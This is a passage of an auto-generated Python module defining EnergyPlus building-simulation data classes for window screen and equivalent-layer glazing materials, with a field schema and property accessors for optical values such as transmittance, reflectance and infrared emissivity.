| value < 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Screen Beam-Beam Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `screen_beambeam_solar_transmittance` or None if not set
"""
return self["Screen Beam-Beam Solar Transmittance"]
@screen_beambeam_solar_transmittance.setter
def screen_beambeam_solar_transmittance(self, value="autocalculate"):
""" Corresponds to IDD field `Screen Beam-Beam Solar Transmittance`
"""
self["Screen Beam-Beam Solar Transmittance"] = value
@property
def screen_beamdiffuse_solar_transmittance(self):
"""field `Screen Beam-Diffuse Solar Transmittance`
| The beam-diffuse solar transmittance of the screen material at normal
| incidence averaged over the entire spectrum of solar radiation.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Screen Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Screen Beam-Diffuse Solar Transmittance"]
@screen_beamdiffuse_solar_transmittance.setter
def screen_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Screen Beam-Diffuse Solar Transmittance`
"""
self["Screen Beam-Diffuse Solar Transmittance"] = value
@property
def screen_beamdiffuse_solar_reflectance(self):
"""field `Screen Beam-Diffuse Solar Reflectance`
| The beam-diffuse solar reflectance of the screen material at normal
| incidence averaged over the entire spectrum of solar radiation.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Screen Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Screen Beam-Diffuse Solar Reflectance"]
@screen_beamdiffuse_solar_reflectance.setter
def screen_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Screen Beam-Diffuse Solar Reflectance`
"""
self["Screen Beam-Diffuse Solar Reflectance"] = value
@property
def screen_beambeam_visible_transmittance(self):
"""field `Screen Beam-Beam Visible Transmittance`
| The beam-beam visible transmittance of the screen material at normal
| incidence averaged over the visible spectrum range of solar radiation.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Screen Beam-Beam Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_beambeam_visible_transmittance` or None if not set
"""
return self["Screen Beam-Beam Visible Transmittance"]
@screen_beambeam_visible_transmittance.setter
def screen_beambeam_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Screen Beam-Beam Visible Transmittance`
"""
self["Screen Beam-Beam Visible Transmittance"] = value
@property
def screen_beamdiffuse_visible_transmittance(self):
"""field `Screen Beam-Diffuse Visible Transmittance`
| The beam-diffuse visible transmittance of the screen material at normal
| incidence averaged over the visible spectrum range of solar radiation.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Screen Beam-Diffuse Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_beamdiffuse_visible_transmittance` or None if not set
"""
return self["Screen Beam-Diffuse Visible Transmittance"]
@screen_beamdiffuse_visible_transmittance.setter
def screen_beamdiffuse_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Screen Beam-Diffuse Visible Transmittance`
"""
self["Screen Beam-Diffuse Visible Transmittance"] = value
@property
def screen_beamdiffuse_visible_reflectance(self):
"""field `Screen Beam-Diffuse Visible Reflectance`
| Beam-diffuse visible reflectance of the screen material at normal
| incidence averaged over the visible spectrum range of solar radiation.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Screen Beam-Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_beamdiffuse_visible_reflectance` or None if not set
"""
return self["Screen Beam-Diffuse Visible Reflectance"]
@screen_beamdiffuse_visible_reflectance.setter
def screen_beamdiffuse_visible_reflectance(self, value=None):
""" Corresponds to IDD field `Screen Beam-Diffuse Visible Reflectance`
"""
self["Screen Beam-Diffuse Visible Reflectance"] = value
@property
def screen_infrared_transmittance(self):
"""field `Screen Infrared Transmittance`
| The long-wave hemispherical transmittance of the screen material.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| Default value: 0.02
| value < 1.0
Args:
value (float): value for IDD Field `Screen Infrared Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_infrared_transmittance` or None if not set
"""
return self["Screen Infrared Transmittance"]
@screen_infrared_transmittance.setter
def screen_infrared_transmittance(self, value=0.02):
"""Corresponds to IDD field `Screen Infrared Transmittance`"""
self["Screen Infrared Transmittance"] = value
@property
def screen_infrared_emissivity(self):
"""field `Screen Infrared Emissivity`
| The long-wave hemispherical emissivity of the screen material.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| Default value: 0.93
| value < 1.0
Args:
value (float): value for IDD Field `Screen Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_infrared_emissivity` or None if not set
"""
return self["Screen Infrared Emissivity"]
@screen_infrared_emissivity.setter
def screen_infrared_emissivity(self, value=0.93):
"""Corresponds to IDD field `Screen Infrared Emissivity`"""
self["Screen Infrared Emissivity"] = value
@property
def screen_wire_spacing(self):
"""field `Screen Wire Spacing`
| Spacing assumed to be the same in both directions.
| Units: m
| IP-Units: in
| Default value: 0.025
Args:
value (float): value for IDD Field `Screen Wire Spacing`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_wire_spacing` or None if not set
"""
return self["Screen Wire Spacing"]
@screen_wire_spacing.setter
def screen_wire_spacing(self, value=0.025):
"""Corresponds to IDD field `Screen Wire Spacing`"""
self["Screen Wire Spacing"] = value
@property
def screen_wire_diameter(self):
"""field `Screen Wire Diameter`
| Diameter assumed to be the same in both directions.
| Units: m
| IP-Units: in
| Default value: 0.005
Args:
value (float): value for IDD Field `Screen Wire Diameter`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_wire_diameter` or None if not set
"""
return self["Screen Wire Diameter"]
@screen_wire_diameter.setter
def screen_wire_diameter(self, value=0.005):
"""Corresponds to IDD field `Screen Wire Diameter`"""
self["Screen Wire Diameter"] = value
class WindowMaterialGlazingEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Glazing:EquivalentLayer`
Glass material properties for Windows or Glass Doors
Transmittance/Reflectance input method.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'optical data type',
{'name': u'Optical Data Type',
'pyname': u'optical_data_type',
'default': u'SpectralAverage',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'window glass spectral data set name',
{'name': u'Window Glass Spectral Data Set Name',
'pyname': u'window_glass_spectral_data_set_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'front side beam-beam solar transmittance',
{'name': u'Front Side Beam-Beam Solar Transmittance',
'pyname': u'front_side_beambeam_solar_transmittance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam solar transmittance',
{'name': u'Back Side Beam-Beam Solar Transmittance',
'pyname': u'back_side_beambeam_solar_transmittance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-beam solar reflectance',
{'name': u'Front Side Beam-Beam Solar Reflectance',
'pyname': u'front_side_beambeam_solar_reflectance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam solar reflectance',
{'name': u'Back Side Beam-Beam Solar Reflectance',
'pyname': u'back_side_beambeam_solar_reflectance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-beam visible solar transmittance',
{'name': u'Front Side Beam-Beam Visible Solar Transmittance',
'pyname': u'front_side_beambeam_visible_solar_transmittance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam visible solar transmittance',
{'name': u'Back Side Beam-Beam Visible Solar Transmittance',
'pyname': u'back_side_beambeam_visible_solar_transmittance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-beam visible solar reflectance',
{'name': u'Front Side Beam-Beam Visible Solar Reflectance',
'pyname': u'front_side_beambeam_visible_solar_reflectance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam visible solar reflectance',
{'name': u'Back Side Beam-Beam Visible Solar Reflectance',
'pyname': u'back_side_beambeam_visible_solar_reflectance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse solar transmittance',
{'name': u'Front Side Beam-Diffuse Solar Transmittance',
'pyname': u'front_side_beamdiffuse_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse solar transmittance',
{'name': u'Back Side Beam-Diffuse Solar Transmittance',
'pyname': u'back_side_beamdiffuse_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse solar reflectance',
{'name': u'Front Side Beam-Diffuse Solar Reflectance',
'pyname': u'front_side_beamdiffuse_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse solar reflectance',
{'name': u'Back Side Beam-Diffuse Solar Reflectance',
'pyname': u'back_side_beamdiffuse_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse visible solar transmittance',
{'name': u'Front Side Beam-Diffuse Visible Solar Transmittance',
'pyname': u'front_side_beamdiffuse_visible_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse visible solar transmittance',
{'name': u'Back Side Beam-Diffuse Visible Solar Transmittance',
'pyname': u'back_side_beamdiffuse_visible_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse visible solar reflectance',
{'name': u'Front Side Beam-Diffuse Visible Solar Reflectance',
'pyname': u'front_side_beamdiffuse_visible_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse visible solar reflectance',
{'name': u'Back Side Beam-Diffuse Visible Solar Reflectance',
'pyname': u'back_side_beamdiffuse_visible_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'diffuse-diffuse solar transmittance',
{'name': u'Diffuse-Diffuse Solar Transmittance',
'pyname': u'diffusediffuse_solar_transmittance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side diffuse-diffuse solar reflectance',
{'name': u'Front Side Diffuse-Diffuse Solar Reflectance',
'pyname': u'front_side_diffusediffuse_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side diffuse-diffuse solar reflectance',
{'name': u'Back Side Diffuse-Diffuse Solar Reflectance',
'pyname': u'back_side_diffusediffuse_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'diffuse-diffuse visible solar transmittance',
{'name': u'Diffuse-Diffuse Visible Solar Transmittance',
'pyname': u'diffusediffuse_visible_solar_transmittance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side diffuse-diffuse visible solar reflectance',
{'name': u'Front Side Diffuse-Diffuse Visible Solar Reflectance',
'pyname': u'front_side_diffusediffuse_visible_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side diffuse-diffuse visible solar reflectance',
{'name': u'Back Side Diffuse-Diffuse Visible Solar Reflectance',
'pyname': u'back_side_diffusediffuse_visible_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'infrared transmittance (applies to front and back)',
{'name': u'Infrared Transmittance (applies to front and back)',
'pyname': u'infrared_transmittance_applies_to_front_and_back',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side infrared emissivity',
{'name': u'Front Side Infrared Emissivity',
'pyname': u'front_side_infrared_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'back side infrared emissivity',
{'name': u'Back Side Infrared Emissivity',
'pyname': u'back_side_infrared_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 11,
'name': u'WindowMaterial:Glazing:EquivalentLayer',
'pyname': u'WindowMaterialGlazingEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def optical_data_type(self):
"""field `Optical Data Type`
| Spectral is no longer supported and SpectralAverage is now the default.
| Default value: SpectralAverage
Args:
value (str): value for IDD Field `Optical Data Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `optical_data_type` or None if not set
"""
return self["Optical Data Type"]
@optical_data_type.setter
def optical_data_type(self, value="SpectralAverage"):
"""Corresponds to IDD field `Optical Data Type`"""
self["Optical Data Type"] = value
@property
def window_glass_spectral_data_set_name(self):
"""field `Window Glass Spectral Data Set Name`
| Used only when Optical Data Type = Spectral
Args:
value (str): value for IDD Field `Window Glass Spectral Data Set Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `window_glass_spectral_data_set_name` or None if not set
"""
return self["Window Glass Spectral Data Set Name"]
@window_glass_spectral_data_set_name.setter
def window_glass_spectral_data_set_name(self, value=None):
"""Corresponds to IDD field `Window Glass Spectral Data Set Name`"""
self["Window Glass Spectral Data Set Name"] = value
@property
def front_side_beambeam_solar_transmittance(self):
"""field `Front Side Beam-Beam Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Beam Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beambeam_solar_transmittance` or None if not set
"""
return self["Front Side Beam-Beam Solar Transmittance"]
@front_side_beambeam_solar_transmittance.setter
def front_side_beambeam_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Beam Solar Transmittance`
"""
self["Front Side Beam-Beam Solar Transmittance"] = value
@property
def back_side_beambeam_solar_transmittance(self):
"""field `Back Side Beam-Beam Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Beam Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beambeam_solar_transmittance` or None if not set
"""
return self["Back Side Beam-Beam Solar Transmittance"]
@back_side_beambeam_solar_transmittance.setter
def back_side_beambeam_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Beam Solar Transmittance`
"""
self["Back Side Beam-Beam Solar Transmittance"] = value
@property
def front_side_beambeam_solar_reflectance(self):
"""field `Front Side Beam-Beam Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Front Side is side closest to outdoor air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Beam Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beambeam_solar_reflectance` or None if not set
"""
return self["Front Side Beam-Beam Solar Reflectance"]
@front_side_beambeam_solar_reflectance.setter
def front_side_beambeam_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Beam Solar Reflectance`
"""
self["Front Side Beam-Beam Solar Reflectance"] = value
@property
def back_side_beambeam_solar_reflectance(self):
"""field `Back Side Beam-Beam Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Back Side is side closest to zone air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Beam Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beambeam_solar_reflectance` or None if not set
"""
return self["Back Side Beam-Beam Solar Reflectance"]
@back_side_beambeam_solar_reflectance.setter
def back_side_beambeam_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Beam Solar Reflectance`
"""
self["Back Side Beam-Beam Solar Reflectance"] = value
@property
def front_side_beambeam_visible_solar_transmittance(self):
"""field `Front Side Beam-Beam Visible Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Beam Visible Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beambeam_visible_solar_transmittance` or None if not set
"""
return self["Front Side Beam-Beam Visible Solar Transmittance"]
@front_side_beambeam_visible_solar_transmittance.setter
def front_side_beambeam_visible_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Beam Visible Solar Transmittance`
"""
self["Front Side Beam-Beam Visible Solar Transmittance"] = value
@property
def back_side_beambeam_visible_solar_transmittance(self):
"""field `Back Side Beam-Beam Visible Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Beam Visible Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beambeam_visible_solar_transmittance` or None if not set
"""
return self["Back Side Beam-Beam Visible Solar Transmittance"]
@back_side_beambeam_visible_solar_transmittance.setter
def back_side_beambeam_visible_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Beam Visible Solar Transmittance`
"""
self["Back Side Beam-Beam Visible Solar Transmittance"] = value
@property
def front_side_beambeam_visible_solar_reflectance(self):
"""field `Front Side Beam-Beam Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Front Side is side closest to outdoor air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Beam Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beambeam_visible_solar_reflectance` or None if not set
"""
return self["Front Side Beam-Beam Visible Solar Reflectance"]
@front_side_beambeam_visible_solar_reflectance.setter
def front_side_beambeam_visible_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Beam Visible Solar Reflectance`
"""
self["Front Side Beam-Beam Visible Solar Reflectance"] = value
@property
def back_side_beambeam_visible_solar_reflectance(self):
"""field `Back Side Beam-Beam Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Back Side is side closest to zone air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Beam Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beambeam_visible_solar_reflectance` or None if not set
"""
return self["Back Side Beam-Beam Visible Solar Reflectance"]
@back_side_beambeam_visible_solar_reflectance.setter
def back_side_beambeam_visible_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Beam Visible Solar Reflectance`
"""
self["Back Side Beam-Beam Visible Solar Reflectance"] = value
@property
def front_side_beamdiffuse_solar_transmittance(self):
"""field `Front Side Beam-Diffuse Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Front Side Beam-Diffuse Solar Transmittance"]
@front_side_beamdiffuse_solar_transmittance.setter
def front_side_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Diffuse Solar Transmittance`
"""
self["Front Side Beam-Diffuse Solar Transmittance"] = value
@property
def back_side_beamdiffuse_solar_transmittance(self):
"""field `Back Side Beam-Diffuse Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Back Side Beam-Diffuse Solar Transmittance"]
@back_side_beamdiffuse_solar_transmittance.setter
def back_side_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Diffuse Solar Transmittance`
"""
self["Back Side Beam-Diffuse Solar Transmittance"] = value
@property
def front_side_beamdiffuse_solar_reflectance(self):
"""field `Front Side Beam-Diffuse Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Front Side is side closest to outdoor air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Front Side Beam-Diffuse Solar Reflectance"]
@front_side_beamdiffuse_solar_reflectance.setter
def front_side_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Diffuse Solar Reflectance`
"""
self["Front Side Beam-Diffuse Solar Reflectance"] = value
@property
def back_side_beamdiffuse_solar_reflectance(self):
"""field `Back Side Beam-Diffuse Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Back Side is side closest to zone air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Back Side Beam-Diffuse Solar Reflectance"]
@back_side_beamdiffuse_solar_reflectance.setter
def back_side_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Diffuse Solar Reflectance`
"""
self["Back Side Beam-Diffuse Solar Reflectance"] = value
@property
def front_side_beamdiffuse_visible_solar_transmittance(self):
"""field `Front Side Beam-Diffuse Visible Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Diffuse Visible Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beamdiffuse_visible_solar_transmittance` or None if not set
"""
return self["Front Side Beam-Diffuse Visible Solar Transmittance"]
@front_side_beamdiffuse_visible_solar_transmittance.setter
def front_side_beamdiffuse_visible_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Diffuse Visible Solar Transmittance`
"""
self["Front Side Beam-Diffuse Visible Solar Transmittance"] = value
@property
def back_side_beamdiffuse_visible_solar_transmittance(self):
"""field `Back Side Beam-Diffuse Visible Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Diffuse Visible Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beamdiffuse_visible_solar_transmittance` or None if not set
"""
return self["Back Side Beam-Diffuse Visible Solar Transmittance"]
@back_side_beamdiffuse_visible_solar_transmittance.setter
def back_side_beamdiffuse_visible_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Diffuse Visible Solar Transmittance`
"""
self["Back Side Beam-Diffuse Visible Solar Transmittance"] = value
@property
def front_side_beamdiffuse_visible_solar_reflectance(self):
"""field `Front Side Beam-Diffuse Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Front Side is side closest to outdoor air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Beam-Diffuse Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_beamdiffuse_visible_solar_reflectance` or None if not set
"""
return self["Front Side Beam-Diffuse Visible Solar Reflectance"]
@front_side_beamdiffuse_visible_solar_reflectance.setter
def front_side_beamdiffuse_visible_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Beam-Diffuse Visible Solar Reflectance`
"""
self["Front Side Beam-Diffuse Visible Solar Reflectance"] = value
@property
def back_side_beamdiffuse_visible_solar_reflectance(self):
"""field `Back Side Beam-Diffuse Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| Back Side is side closest to zone air
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Beam-Diffuse Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_beamdiffuse_visible_solar_reflectance` or None if not set
"""
return self["Back Side Beam-Diffuse Visible Solar Reflectance"]
@back_side_beamdiffuse_visible_solar_reflectance.setter
def back_side_beamdiffuse_visible_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Beam-Diffuse Visible Solar Reflectance`
"""
self["Back Side Beam-Diffuse Visible Solar Reflectance"] = value
@property
def diffusediffuse_solar_transmittance(self):
"""field `Diffuse-Diffuse Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| If this field is autocalculate, then the diffuse-diffuse solar
| transmittance is automatically estimated from other inputs and used
| in subsequent calculations. If this field is zero or positive, then
| the value entered here will be used.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Diffuse-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `diffusediffuse_solar_transmittance` or None if not set
"""
return self["Diffuse-Diffuse Solar Transmittance"]
@diffusediffuse_solar_transmittance.setter
def diffusediffuse_solar_transmittance(self, value="autocalculate"):
""" Corresponds to IDD field `Diffuse-Diffuse Solar Transmittance`
"""
self["Diffuse-Diffuse Solar Transmittance"] = value
@property
def front_side_diffusediffuse_solar_reflectance(self):
"""field `Front Side Diffuse-Diffuse Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| If this field is autocalculate, then the front diffuse-diffuse solar
| reflectance is automatically estimated from other inputs and used in
| subsequent calculations. If this field is zero or positive, then the value
| entered here will be used. Front Side is side closest to outdoor air.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Front Side Diffuse-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `front_side_diffusediffuse_solar_reflectance` or None if not set
"""
return self["Front Side Diffuse-Diffuse Solar Reflectance"]
@front_side_diffusediffuse_solar_reflectance.setter
def front_side_diffusediffuse_solar_reflectance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Front Side Diffuse-Diffuse Solar Reflectance`
"""
self["Front Side Diffuse-Diffuse Solar Reflectance"] = value
@property
def back_side_diffusediffuse_solar_reflectance(self):
"""field `Back Side Diffuse-Diffuse Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| If this field is autocalculate, then the back diffuse-diffuse solar
| reflectance is automatically estimated from other inputs and used in
| subsequent calculations. If this field is zero or positive, then the value
| entered here will be used. Back side is side closest to indoor air.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Back Side Diffuse-Diffuse Solar Reflectance`
Raises:
